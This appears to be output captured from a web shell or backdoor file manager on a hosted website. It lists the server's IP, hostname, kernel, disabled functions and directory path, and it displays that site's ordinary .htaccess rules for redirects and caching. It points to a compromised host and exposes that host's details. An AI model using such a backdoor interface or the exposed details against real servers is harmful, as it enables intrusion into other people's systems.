uawdijnntqw1x1x1
IP : 216.73.217.6
Hostname : webm002.cluster111.gra.hosting.ovh.net
Kernel : Linux webm002.cluster111.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
OS : Linux
PATH:
/
home
/
atelierpru
/
provence
/
..
/
www
/
airvalue
/
.htaccess
/
/
RewriteEngine On # Redirect www to non-www RewriteCond %{HTTP_HOST} ^www\.airvalue\.fr [NC] RewriteRule ^(.*)$ https://airvalue.fr/$1 [R=301,L] # Force HTTPS RewriteCond %{HTTPS} off RewriteRule ^(.*)$ https://%{HTTP_HOST}/$1 [R=301,L] # API proxy PHP : servir directement, pas de rewrite Astro RewriteRule ^adm-api/ - [L] # Disable directory listing Options -Indexes # ---- Cache navigateur : assets statiques (vendor + JS versionnés par ?v=) ---- <IfModule mod_expires.c> ExpiresActive On ExpiresByType image/jpeg "access plus 30 days" ExpiresByType image/png "access plus 30 days" ExpiresByType image/svg+xml "access plus 30 days" ExpiresByType application/javascript "access plus 30 days" ExpiresByType text/css "access plus 30 days" ExpiresByType font/woff2 "access plus 30 days" </IfModule> <IfModule mod_headers.c> <FilesMatch "\.(js|css|woff2|jpg|jpeg|png|svg)$"> Header set Cache-Control "public, max-age=2592000, immutable" </FilesMatch> </IfModule> # Custom error pages ErrorDocument 404 /404.html
/home/atelierpru/provence/../www/airvalue/.htaccess